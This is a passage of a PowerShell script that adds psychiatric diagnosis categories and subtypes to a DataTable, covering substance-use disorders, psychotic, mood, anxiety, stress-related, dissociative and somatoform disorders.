uncomplicated") + $null = $DiagnosisList.Rows.Add("Nicotine dependence, cigarettes","Nicotine dependence, cigarettes, in remission") + $null = $DiagnosisList.Rows.Add("Nicotine dependence, cigarettes","Nicotine dependence, cigarettes, with withdrawal") + $null = $DiagnosisList.Rows.Add("Nicotine dependence, cigarettes","Nicotine dependence, cigarettes, with other nicotine-induced disorders") + $null = $DiagnosisList.Rows.Add("Nicotine dependence, cigarettes","Nicotine dependence, cigarettes, with unspecified nicotine-induced disorders") + $null = $DiagnosisList.Rows.Add("Nicotine dependence, chewing tobacco","Nicotine dependence, chewing tobacco, uncomplicated") + $null = $DiagnosisList.Rows.Add("Nicotine dependence, chewing tobacco","Nicotine dependence, chewing tobacco, in remission") + $null = $DiagnosisList.Rows.Add("Nicotine dependence, chewing tobacco","Nicotine dependence, chewing tobacco, with withdrawal") + $null = $DiagnosisList.Rows.Add("Nicotine dependence, chewing tobacco","Nicotine dependence, chewing tobacco, with other nicotine-induced disorders") + $null = $DiagnosisList.Rows.Add("Nicotine dependence, chewing tobacco","Nicotine dependence, chewing tobacco, with unspecified nicotine-induced disorders") + $null = $DiagnosisList.Rows.Add("Nicotine dependence, other tobacco product","Nicotine dependence, other tobacco product, uncomplicated") + $null = $DiagnosisList.Rows.Add("Nicotine dependence, other tobacco product","Nicotine dependence, other tobacco product, in remission") + $null = $DiagnosisList.Rows.Add("Nicotine dependence, other tobacco product","Nicotine dependence, other tobacco product, with withdrawal") + $null = $DiagnosisList.Rows.Add("Nicotine dependence, other tobacco product","Nicotine dependence, other tobacco product, with other nicotine-induced disorders") + $null = $DiagnosisList.Rows.Add("Nicotine dependence, other tobacco product","Nicotine dependence, other tobacco product, with unspecified nicotine-induced disorders") + $null = $DiagnosisList.Rows.Add("Inhalant abuse","Inhalant abuse, uncomplicated") + $null = $DiagnosisList.Rows.Add("Inhalant abuse","Inhalant abuse, in remission") + $null = $DiagnosisList.Rows.Add("Inhalant abuse with intoxication","Inhalant abuse with intoxication, uncomplicated") + $null = $DiagnosisList.Rows.Add("Inhalant abuse with intoxication","Inhalant abuse with intoxication delirium") + $null = $DiagnosisList.Rows.Add("Inhalant abuse with intoxication","Inhalant abuse with intoxication, unspecified") + $null = $DiagnosisList.Rows.Add("Inhalant abuse with inhalant-induced mood disorder","Inhalant abuse with inhalant-induced mood disorder") + $null = $DiagnosisList.Rows.Add("Inhalant abuse with inhalant-induced psychotic disorder","Inhalant abuse with inhalant-induced psychotic disorder with delusions") + $null = $DiagnosisList.Rows.Add("Inhalant abuse with inhalant-induced psychotic disorder","Inhalant abuse with inhalant-induced psychotic disorder with hallucinations") + $null = $DiagnosisList.Rows.Add("Inhalant abuse with inhalant-induced psychotic disorder","Inhalant abuse with inhalant-induced psychotic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Inhalant abuse with inhalant-induced dementia","Inhalant abuse with inhalant-induced dementia") + $null = $DiagnosisList.Rows.Add("Inhalant abuse with other inhalant-induced disorders","Inhalant abuse with inhalant-induced anxiety disorder") + $null = $DiagnosisList.Rows.Add("Inhalant abuse with other inhalant-induced disorders","Inhalant abuse with other inhalant-induced disorder") + $null = $DiagnosisList.Rows.Add("Inhalant abuse with unspecified inhalant-induced disorder","Inhalant abuse with unspecified inhalant-induced disorder") + $null = $DiagnosisList.Rows.Add("Inhalant dependence","Inhalant dependence, uncomplicated") + $null = $DiagnosisList.Rows.Add("Inhalant dependence","Inhalant dependence, in remission") + $null = $DiagnosisList.Rows.Add("Inhalant dependence with intoxication","Inhalant dependence with intoxication, uncomplicated") + $null = $DiagnosisList.Rows.Add("Inhalant dependence with intoxication","Inhalant dependence with intoxication delirium") + $null = $DiagnosisList.Rows.Add("Inhalant dependence with intoxication","Inhalant dependence with intoxication, unspecified") + $null = $DiagnosisList.Rows.Add("Inhalant dependence with inhalant-induced mood disorder","Inhalant dependence with inhalant-induced mood disorder") + $null = $DiagnosisList.Rows.Add("Inhalant dependence with inhalant-induced psychotic disorder","Inhalant dependence with inhalant-induced psychotic disorder with delusions") + $null = $DiagnosisList.Rows.Add("Inhalant dependence with inhalant-induced psychotic disorder","Inhalant dependence with inhalant-induced psychotic disorder with hallucinations") + $null = $DiagnosisList.Rows.Add("Inhalant dependence with inhalant-induced psychotic disorder","Inhalant dependence with inhalant-induced psychotic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Inhalant dependence with inhalant-induced dementia","Inhalant dependence with inhalant-induced dementia") + $null = $DiagnosisList.Rows.Add("Inhalant dependence with other inhalant-induced disorders","Inhalant dependence with inhalant-induced anxiety disorder") + $null = $DiagnosisList.Rows.Add("Inhalant dependence with other inhalant-induced disorders","Inhalant dependence with other inhalant-induced disorder") + $null = $DiagnosisList.Rows.Add("Inhalant dependence with unspecified inhalant-induced disorder","Inhalant dependence with unspecified inhalant-induced disorder") + $null = $DiagnosisList.Rows.Add("Inhalant use, unspecified","Inhalant use, unspecified, uncomplicated") + $null = $DiagnosisList.Rows.Add("Inhalant use, unspecified with intoxication","Inhalant use, unspecified with intoxication, uncomplicated") + $null = $DiagnosisList.Rows.Add("Inhalant use, unspecified with intoxication","Inhalant use, unspecified with intoxication with delirium") + $null = $DiagnosisList.Rows.Add("Inhalant use, unspecified with intoxication","Inhalant use, unspecified with intoxication, unspecified") + $null = $DiagnosisList.Rows.Add("Inhalant use, unspecified with inhalant-induced mood disorder","Inhalant use, unspecified with inhalant-induced mood disorder") + $null = $DiagnosisList.Rows.Add("Inhalant use, unspecified with inhalant-induced psychotic disorder","Inhalant use, unspecified with inhalant-induced psychotic disorder with delusions") + $null = $DiagnosisList.Rows.Add("Inhalant use, unspecified with inhalant-induced psychotic disorder","Inhalant use, unspecified with inhalant-induced psychotic disorder with hallucinations") + $null = $DiagnosisList.Rows.Add("Inhalant use, unspecified with inhalant-induced psychotic disorder","Inhalant use, unspecified with inhalant-induced psychotic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Inhalant use, unspecified with inhalant-induced persisting dementia","Inhalant use, unspecified with inhalant-induced persisting dementia") + $null = $DiagnosisList.Rows.Add("Inhalant use, unspecified with other inhalant-induced disorders","Inhalant use, unspecified with inhalant-induced anxiety disorder") + $null = $DiagnosisList.Rows.Add("Inhalant use, unspecified with other inhalant-induced disorders","Inhalant use, unspecified with other inhalant-induced disorder") + $null = $DiagnosisList.Rows.Add("Inhalant use, unspecified with unspecified inhalant-induced disorder","Inhalant use, unspecified with unspecified inhalant-induced disorder") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance abuse","Other psychoactive substance abuse, uncomplicated") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance abuse","Other psychoactive substance abuse, in remission") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance abuse with intoxication","Other psychoactive substance abuse with intoxication, uncomplicated") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance abuse with intoxication","Other psychoactive substance abuse with intoxication delirium") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance abuse with intoxication","Other psychoactive substance abuse with intoxication with perceptual disturbances") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance abuse with intoxication","Other psychoactive substance abuse with intoxication, unspecified") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance abuse with psychoactive substance-induced mood disorder","Other psychoactive substance abuse with psychoactive substance-induced mood disorder") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance abuse with psychoactive substance-induced psychotic disorder","Other psychoactive substance abuse with psychoactive substance-induced psychotic disorder with delusions") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance abuse with psychoactive substance-induced psychotic disorder","Other psychoactive substance abuse with psychoactive substance-induced psychotic disorder with hallucinations") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance abuse with psychoactive substance-induced psychotic disorder","Other psychoactive substance abuse with psychoactive substance-induced psychotic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance abuse with psychoactive substance-induced persisting amnestic disorder","Other psychoactive substance abuse with psychoactive substance-induced persisting amnestic disorder") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance abuse with psychoactive substance-induced persisting dementia","Other psychoactive substance abuse with psychoactive substance-induced persisting dementia") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance abuse with other psychoactive substance-induced disorders","Other psychoactive substance abuse with psychoactive substance-induced anxiety disorder") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance abuse with other psychoactive substance-induced disorders","Other psychoactive substance abuse with psychoactive substance-induced sexual dysfunction") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance abuse with other psychoactive substance-induced disorders","Other psychoactive substance abuse with psychoactive substance-induced sleep disorder") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance abuse with other psychoactive substance-induced disorders","Other psychoactive substance abuse with other psychoactive substance-induced disorder") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance abuse with unspecified psychoactive substance-induced disorder","Other psychoactive substance abuse with unspecified psychoactive substance-induced disorder") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance dependence","Other psychoactive substance dependence, uncomplicated") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance dependence","Other psychoactive substance dependence, in remission") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance dependence with intoxication","Other psychoactive substance dependence with intoxication, uncomplicated") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance dependence with intoxication","Other psychoactive substance dependence with intoxication delirium") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance dependence with intoxication","Other psychoactive substance dependence with intoxication with perceptual disturbance") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance dependence with intoxication","Other psychoactive substance dependence with intoxication, unspecified") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance dependence with withdrawal","Other psychoactive substance dependence with withdrawal, uncomplicated") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance dependence with withdrawal","Other psychoactive substance dependence with withdrawal delirium") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance dependence with withdrawal","Other psychoactive substance dependence with withdrawal with perceptual disturbance") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance dependence with withdrawal","Other psychoactive substance dependence with withdrawal, unspecified") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance dependence with psychoactive substance-induced mood disorder","Other psychoactive substance dependence with psychoactive substance-induced mood disorder") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance dependence with psychoactive substance-induced psychotic disorder","Other psychoactive substance dependence with psychoactive substance-induced psychotic disorder with delusions") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance dependence with psychoactive substance-induced psychotic disorder","Other psychoactive substance dependence with psychoactive substance-induced psychotic disorder with hallucinations") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance dependence with psychoactive substance-induced psychotic disorder","Other psychoactive substance dependence with psychoactive substance-induced psychotic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance dependence with psychoactive substance-induced persisting amnestic disorder","Other psychoactive substance dependence with psychoactive substance-induced persisting amnestic disorder") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance dependence with psychoactive substance-induced persisting dementia","Other psychoactive substance dependence with psychoactive substance-induced persisting dementia") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance dependence with other psychoactive substance-induced disorders","Other psychoactive substance dependence with psychoactive substance-induced anxiety disorder") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance dependence with other psychoactive substance-induced disorders","Other psychoactive substance dependence with psychoactive substance-induced sexual dysfunction") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance dependence with other psychoactive substance-induced disorders","Other psychoactive substance dependence with psychoactive substance-induced sleep disorder") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance dependence with other psychoactive substance-induced disorders","Other psychoactive substance dependence with other psychoactive substance-induced disorder") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance dependence with unspecified psychoactive substance-induced disorder","Other psychoactive substance dependence with unspecified psychoactive substance-induced disorder") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance use, unspecified","Other psychoactive substance use, unspecified, uncomplicated") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance use, unspecified with intoxication","Other psychoactive substance use, unspecified with intoxication, uncomplicated") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance use, unspecified with intoxication","Other psychoactive substance use, unspecified with intoxication with delirium") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance use, unspecified with intoxication","Other psychoactive substance use, unspecified with intoxication with perceptual disturbance") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance use, unspecified with intoxication","Other psychoactive substance use, unspecified with intoxication, unspecified") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance use, unspecified with withdrawal","Other psychoactive substance use, unspecified with withdrawal, uncomplicated") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance use, unspecified with withdrawal","Other psychoactive substance use, unspecified with withdrawal delirium") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance use, unspecified with withdrawal","Other psychoactive substance use, unspecified with withdrawal with perceptual disturbance") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance use, unspecified with withdrawal","Other psychoactive substance use, unspecified with withdrawal, unspecified") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance use, unspecified with psychoactive substance-induced mood disorder","Other psychoactive substance use, unspecified with psychoactive substance-induced mood disorder") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance use, unspecified with psychoactive substance-induced psychotic disorder","Other psychoactive substance use, unspecified with psychoactive substance-induced psychotic disorder with delusions") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance use, unspecified with psychoactive substance-induced psychotic disorder","Other psychoactive substance use, unspecified with psychoactive substance-induced psychotic disorder with hallucinations") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance use, unspecified with psychoactive substance-induced psychotic disorder","Other psychoactive substance use, unspecified with psychoactive substance-induced psychotic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance use, unspecified with psychoactive substance-induced persisting amnestic disorder","Other psychoactive substance use, unspecified with psychoactive substance-induced persisting amnestic disorder") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance use, unspecified with psychoactive substance-induced persisting dementia","Other psychoactive substance use, unspecified with psychoactive substance-induced persisting dementia") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance use, unspecified with other psychoactive substance-induced disorders","Other psychoactive substance use, unspecified with psychoactive substance-induced anxiety disorder") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance use, unspecified with other psychoactive substance-induced disorders","Other psychoactive substance use, unspecified with psychoactive substance-induced sexual dysfunction") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance use, unspecified with other psychoactive substance-induced disorders","Other psychoactive substance use, unspecified with psychoactive substance-induced sleep disorder") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance use, unspecified with other psychoactive substance-induced disorders","Other psychoactive substance use, unspecified with other psychoactive substance-induced disorder") + $null = $DiagnosisList.Rows.Add("Other psychoactive substance use, unspecified with unspecified psychoactive substance-induced disorder","Other psychoactive substance use, unspecified with unspecified psychoactive substance-induced disorder") + $null = $DiagnosisList.Rows.Add("Schizophrenia","Paranoid schizophrenia") + $null = $DiagnosisList.Rows.Add("Schizophrenia","Disorganized schizophrenia") + $null = $DiagnosisList.Rows.Add("Schizophrenia","Catatonic schizophrenia") + $null = $DiagnosisList.Rows.Add("Schizophrenia","Undifferentiated schizophrenia") + $null = $DiagnosisList.Rows.Add("Schizophrenia","Residual schizophrenia") + $null = $DiagnosisList.Rows.Add("Other schizophrenia","Schizophreniform disorder") + $null = $DiagnosisList.Rows.Add("Other schizophrenia","Other schizophrenia") + $null = $DiagnosisList.Rows.Add("Schizophrenia, unspecified","Schizophrenia, unspecified") + $null = $DiagnosisList.Rows.Add("Schizotypal disorder","Schizotypal disorder") + $null = $DiagnosisList.Rows.Add("Delusional disorders","Delusional disorders") + $null = $DiagnosisList.Rows.Add("Brief psychotic disorder","Brief psychotic disorder") + $null = $DiagnosisList.Rows.Add("Shared psychotic disorder","Shared psychotic disorder") + $null = $DiagnosisList.Rows.Add("Schizoaffective disorders","Schizoaffective disorder, bipolar type") + $null = $DiagnosisList.Rows.Add("Schizoaffective disorders","Schizoaffective disorder, depressive type") + $null = $DiagnosisList.Rows.Add("Schizoaffective disorders","Other schizoaffective disorders") + $null = $DiagnosisList.Rows.Add("Schizoaffective disorders","Schizoaffective disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Other psychotic disorder not due to a substance or known physiological condition","Other psychotic disorder not due to a substance or known physiological condition") + $null = $DiagnosisList.Rows.Add("Unspecified psychosis not due to a substance or known physiological condition","Unspecified psychosis not due to a substance or known physiological condition") + $null = $DiagnosisList.Rows.Add("Manic episode without psychotic symptoms","Manic episode without psychotic symptoms, unspecified") + $null = $DiagnosisList.Rows.Add("Manic episode without psychotic symptoms","Manic episode without psychotic symptoms, mild") + $null = $DiagnosisList.Rows.Add("Manic episode without psychotic symptoms","Manic episode without psychotic symptoms, moderate") + $null = $DiagnosisList.Rows.Add("Manic episode without psychotic symptoms","Manic episode, severe, without psychotic symptoms") + $null = $DiagnosisList.Rows.Add("Manic episode, severe with psychotic symptoms","Manic episode, severe with psychotic symptoms") + $null = $DiagnosisList.Rows.Add("Manic episode in partial remission","Manic episode in partial remission") + $null = $DiagnosisList.Rows.Add("Manic episode in full remission","Manic episode in full remission") + $null = $DiagnosisList.Rows.Add("Other manic episodes","Other manic episodes") + $null = $DiagnosisList.Rows.Add("Manic episode, unspecified","Manic episode, unspecified") + $null = $DiagnosisList.Rows.Add("Bipolar disorder","Bipolar disorder, current episode hypomanic") + $null = $DiagnosisList.Rows.Add("Bipolar disorder, current episode manic without psychotic features","Bipolar disorder, current episode manic without psychotic features, unspecified") + $null = $DiagnosisList.Rows.Add("Bipolar disorder, current episode manic without psychotic features","Bipolar disorder, current episode manic without psychotic features, mild") + $null = $DiagnosisList.Rows.Add("Bipolar disorder, current episode manic without psychotic features","Bipolar disorder, current episode manic without psychotic features, moderate") + $null = $DiagnosisList.Rows.Add("Bipolar disorder, current episode manic without psychotic features","Bipolar disorder, current episode manic without psychotic features, severe") + $null = $DiagnosisList.Rows.Add("Bipolar disorder, current episode manic severe with psychotic features","Bipolar disorder, current episode manic severe with psychotic features") + $null = $DiagnosisList.Rows.Add("Bipolar disorder, current episode depressed, mild or moderate severity","Bipolar disorder, current episode depressed, mild or moderate severity, unspecified") + $null = $DiagnosisList.Rows.Add("Bipolar disorder, current episode depressed, mild or moderate severity","Bipolar disorder, current episode depressed, mild") + $null = $DiagnosisList.Rows.Add("Bipolar disorder, current episode depressed, mild or moderate severity","Bipolar disorder, current episode depressed, moderate") + $null = $DiagnosisList.Rows.Add("Bipolar disorder, current episode depressed, severe, without psychotic features","Bipolar disorder, current episode depressed, severe, without psychotic features") + $null = $DiagnosisList.Rows.Add("Bipolar disorder, current episode depressed, severe, with psychotic features","Bipolar disorder, current episode depressed, severe, with psychotic features") + $null = $DiagnosisList.Rows.Add("Bipolar disorder, current episode mixed","Bipolar disorder, current episode mixed, unspecified") + $null = $DiagnosisList.Rows.Add("Bipolar disorder, current episode mixed","Bipolar disorder, current episode mixed, mild") + $null = $DiagnosisList.Rows.Add("Bipolar disorder, current episode mixed","Bipolar disorder, current episode mixed, moderate") + $null = $DiagnosisList.Rows.Add("Bipolar disorder, current episode mixed","Bipolar disorder, current episode mixed, severe, without psychotic features") + $null = $DiagnosisList.Rows.Add("Bipolar disorder, current episode mixed","Bipolar disorder, current episode mixed, severe, with psychotic features") + $null = $DiagnosisList.Rows.Add("Bipolar disorder, currently in remission","Bipolar disorder, currently in remission, most recent episode unspecified") + $null = $DiagnosisList.Rows.Add("Bipolar disorder, currently in remission","Bipolar disorder, in partial remission, most recent episode hypomanic") + $null = $DiagnosisList.Rows.Add("Bipolar disorder, currently in remission","Bipolar disorder, in full remission, most recent episode hypomanic") + $null = $DiagnosisList.Rows.Add("Bipolar disorder, currently in remission","Bipolar disorder, in partial remission, most recent episode manic") + $null = $DiagnosisList.Rows.Add("Bipolar disorder, currently in remission","Bipolar disorder, in full remission, most recent episode manic") + $null = $DiagnosisList.Rows.Add("Bipolar disorder, currently in remission","Bipolar disorder, in partial remission, most recent episode depressed") + $null = $DiagnosisList.Rows.Add("Bipolar disorder, currently in remission","Bipolar disorder, in full remission, most recent episode depressed") + $null = $DiagnosisList.Rows.Add("Bipolar disorder, currently in remission","Bipolar disorder, in partial remission, most recent episode mixed") + $null = $DiagnosisList.Rows.Add("Bipolar disorder, currently in remission","Bipolar disorder, in full remission, most recent episode mixed") + $null = $DiagnosisList.Rows.Add("Other bipolar disorders","Bipolar II disorder") + $null = $DiagnosisList.Rows.Add("Other bipolar disorders","Other bipolar disorder") + $null = $DiagnosisList.Rows.Add("Bipolar disorder, unspecified","Bipolar disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Major depressive disorder, single episode","Major depressive disorder, single episode, mild") + $null = $DiagnosisList.Rows.Add("Major depressive disorder, single episode","Major depressive disorder, single episode, moderate") + $null = $DiagnosisList.Rows.Add("Major depressive disorder, single episode","Major depressive disorder, single episode, severe without psychotic features") + $null = $DiagnosisList.Rows.Add("Major depressive disorder, single episode","Major depressive disorder, single episode, severe with psychotic features") + $null = $DiagnosisList.Rows.Add("Major depressive disorder, single episode","Major depressive disorder, single episode, in partial remission") + $null = $DiagnosisList.Rows.Add("Major depressive disorder, single episode","Major depressive disorder, single episode, in full remission") + $null = $DiagnosisList.Rows.Add("Other depressive episodes","Premenstrual dysphoric disorder") + $null = $DiagnosisList.Rows.Add("Other depressive episodes","Other specified depressive episodes") + $null = $DiagnosisList.Rows.Add("Major depressive disorder, single episode, unspecified","Major depressive disorder, single episode, unspecified") + $null = $DiagnosisList.Rows.Add("Major depressive disorder, recurrent","Major depressive disorder, recurrent, mild") + $null = $DiagnosisList.Rows.Add("Major depressive disorder, recurrent","Major depressive disorder, recurrent, moderate") + $null = $DiagnosisList.Rows.Add("Major depressive disorder, recurrent","Major depressive disorder, recurrent severe without psychotic features") + $null = $DiagnosisList.Rows.Add("Major depressive disorder, recurrent","Major depressive disorder, recurrent, severe with psychotic symptoms") + $null = $DiagnosisList.Rows.Add("Major depressive disorder, recurrent, in remission","Major depressive disorder, recurrent, in remission, unspecified") + $null = $DiagnosisList.Rows.Add("Major depressive disorder, recurrent, in remission","Major depressive disorder, recurrent, in partial remission") + $null = $DiagnosisList.Rows.Add("Major depressive disorder, recurrent, in remission","Major depressive disorder, recurrent, in full remission") + $null = $DiagnosisList.Rows.Add("Other recurrent depressive disorders","Other recurrent depressive disorders") + $null = $DiagnosisList.Rows.Add("Major depressive disorder, recurrent, unspecified","Major depressive disorder, recurrent, unspecified") + $null = $DiagnosisList.Rows.Add("Persistent mood [affective] disorders","Cyclothymic disorder") + $null = $DiagnosisList.Rows.Add("Persistent mood [affective] disorders","Dysthymic disorder") + $null = $DiagnosisList.Rows.Add("Other persistent mood [affective] disorders","Disruptive mood dysregulation disorder") + $null = $DiagnosisList.Rows.Add("Other persistent mood [affective] disorders","Other specified persistent mood disorders") + $null = $DiagnosisList.Rows.Add("Persistent mood [affective] disorder, unspecified","Persistent mood [affective] disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Unspecified mood [affective] disorder","Unspecified mood [affective] disorder") + $null = $DiagnosisList.Rows.Add("Agoraphobia","Agoraphobia, unspecified") + $null = $DiagnosisList.Rows.Add("Agoraphobia","Agoraphobia with panic disorder") + $null = $DiagnosisList.Rows.Add("Agoraphobia","Agoraphobia without panic disorder") + $null = $DiagnosisList.Rows.Add("Social phobias","Social phobia, unspecified") + $null = $DiagnosisList.Rows.Add("Social phobias","Social phobia, generalized") + $null = $DiagnosisList.Rows.Add("Animal type phobia","Arachnophobia") + $null = $DiagnosisList.Rows.Add("Animal type phobia","Other animal type phobia") + $null = $DiagnosisList.Rows.Add("Natural environment type phobia","Fear of thunderstorms") + $null = $DiagnosisList.Rows.Add("Natural environment type phobia","Other natural environment type phobia") + $null = $DiagnosisList.Rows.Add("Blood, injection, injury type phobia","Fear of blood") + $null = $DiagnosisList.Rows.Add("Blood, injection, injury type phobia","Fear of injections and transfusions") + $null = $DiagnosisList.Rows.Add("Blood, injection, injury type phobia","Fear of other medical care") + $null = $DiagnosisList.Rows.Add("Blood, injection, injury type phobia","Fear of injury") + $null = $DiagnosisList.Rows.Add("Situational type phobia","Claustrophobia") + $null = $DiagnosisList.Rows.Add("Situational type phobia","Acrophobia") + $null = $DiagnosisList.Rows.Add("Situational type phobia","Fear of bridges") + $null = $DiagnosisList.Rows.Add("Situational type phobia","Fear of flying") + $null = $DiagnosisList.Rows.Add("Situational type phobia","Other situational type phobia") + $null = $DiagnosisList.Rows.Add("Other specified phobia","Androphobia") + $null = $DiagnosisList.Rows.Add("Other specified phobia","Gynephobia") + $null = $DiagnosisList.Rows.Add("Other specified phobia","Other specified phobia") + $null = $DiagnosisList.Rows.Add("Other phobic anxiety disorders","Other phobic anxiety disorders") + $null = $DiagnosisList.Rows.Add("Phobic anxiety disorder, unspecified","Phobic anxiety disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Other anxiety disorders","Panic disorder [episodic paroxysmal anxiety]") + $null = $DiagnosisList.Rows.Add("Other anxiety disorders","Generalized anxiety disorder") + $null = $DiagnosisList.Rows.Add("Other anxiety disorders","Other mixed anxiety disorders") + $null = $DiagnosisList.Rows.Add("Other anxiety disorders","Other specified anxiety disorders") + $null = $DiagnosisList.Rows.Add("Other anxiety disorders","Anxiety disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Obsessive-compulsive disorder","Mixed obsessional thoughts and acts") + $null = $DiagnosisList.Rows.Add("Obsessive-compulsive disorder","Hoarding disorder") + $null = $DiagnosisList.Rows.Add("Obsessive-compulsive disorder","Excoriation (skin-picking) disorder") + $null = $DiagnosisList.Rows.Add("Obsessive-compulsive disorder","Other obsessive-compulsive disorder") + $null = $DiagnosisList.Rows.Add("Obsessive-compulsive disorder","Obsessive-compulsive disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Reaction to severe stress, and adjustment disorders","Acute stress reaction") + $null = $DiagnosisList.Rows.Add("Post-traumatic stress disorder (PTSD)","Post-traumatic stress disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Post-traumatic stress disorder (PTSD)","Post-traumatic stress disorder, acute") + $null = $DiagnosisList.Rows.Add("Post-traumatic stress disorder (PTSD)","Post-traumatic stress disorder, chronic") + $null = $DiagnosisList.Rows.Add("Adjustment disorders","Adjustment disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Adjustment disorders","Adjustment disorder with depressed mood") + $null = $DiagnosisList.Rows.Add("Adjustment disorders","Adjustment disorder with anxiety") + $null = $DiagnosisList.Rows.Add("Adjustment disorders","Adjustment disorder with mixed anxiety and depressed mood") + $null = $DiagnosisList.Rows.Add("Adjustment disorders","Adjustment disorder with disturbance of conduct") + $null = $DiagnosisList.Rows.Add("Adjustment disorders","Adjustment disorder with mixed disturbance of emotions and conduct") + $null = $DiagnosisList.Rows.Add("Adjustment disorders","Adjustment disorder with other symptoms") + $null = $DiagnosisList.Rows.Add("Other reactions to severe stress","Other reactions to severe stress") + $null = $DiagnosisList.Rows.Add("Reaction to severe stress, unspecified","Reaction to severe stress, unspecified") + $null = $DiagnosisList.Rows.Add("Dissociative and conversion disorders","Dissociative amnesia") + $null = $DiagnosisList.Rows.Add("Dissociative and conversion disorders","Dissociative fugue") + $null = $DiagnosisList.Rows.Add("Dissociative and conversion disorders","Dissociative stupor") + $null = $DiagnosisList.Rows.Add("Dissociative and conversion disorders","Conversion disorder with motor symptom or deficit") + $null = $DiagnosisList.Rows.Add("Dissociative and conversion disorders","Conversion disorder with seizures or convulsions") + $null = $DiagnosisList.Rows.Add("Dissociative and conversion disorders","Conversion disorder with sensory symptom or deficit") + $null = $DiagnosisList.Rows.Add("Dissociative and conversion disorders","Conversion disorder with mixed symptom presentation") + $null = $DiagnosisList.Rows.Add("Other dissociative and conversion disorders","Dissociative identity disorder") + $null = $DiagnosisList.Rows.Add("Other dissociative and conversion disorders","Other dissociative and conversion disorders") + $null = $DiagnosisList.Rows.Add("Dissociative and conversion disorder, unspecified","Dissociative and conversion disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Somatoform disorders","Somatization disorder") + $null = $DiagnosisList.Rows.Add("Somatoform disorders","Undifferentiated somatoform disorder") + $null = $DiagnosisList.Rows.Add("Hypochondriacal disorders","Hypochondriacal disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Hypochondriacal disorders","Hypochondriasis") + $null = $DiagnosisList.Rows.Add("Hypochondriacal disorders","Body dysmorphic disorder") + $null = $DiagnosisList.Rows.Add("Hypochondriacal disorders","Other hypochondriacal disorders") + $null = $DiagnosisList.Rows.Add("Pain disorders related to psychological factors","Pain disorder exclusively related to psychological factors") + $null = $DiagnosisList.Rows.Add("Pain disorders related to psychological factors","Pain disorder with related psychological factors") + $null = $DiagnosisList.Rows.Add("Other somatoform disorders","Other somatoform disorders") + $null = $DiagnosisList.Rows.Add("Somatoform disorder, unspecified","Somatoform disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Other nonpsychotic mental disorders","Depersonalization-derealization syndrome") + $null = $DiagnosisList.Rows.Add("Other nonpsychotic mental disorders","Pseudobulbar affect") + $null = $DiagnosisList.Rows.Add("Other nonpsychotic mental disorders","Other specified nonpsychotic mental disorders") + $null = $DiagnosisList.Rows.Add("Other nonpsychotic mental disorders","Nonpsychotic mental disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Anorexia nervosa","Anorexia nervosa, unspecified") + $null = $DiagnosisList.Rows.Add("Anorexia nervosa","Anorexia nervosa, restricting type") + $null = 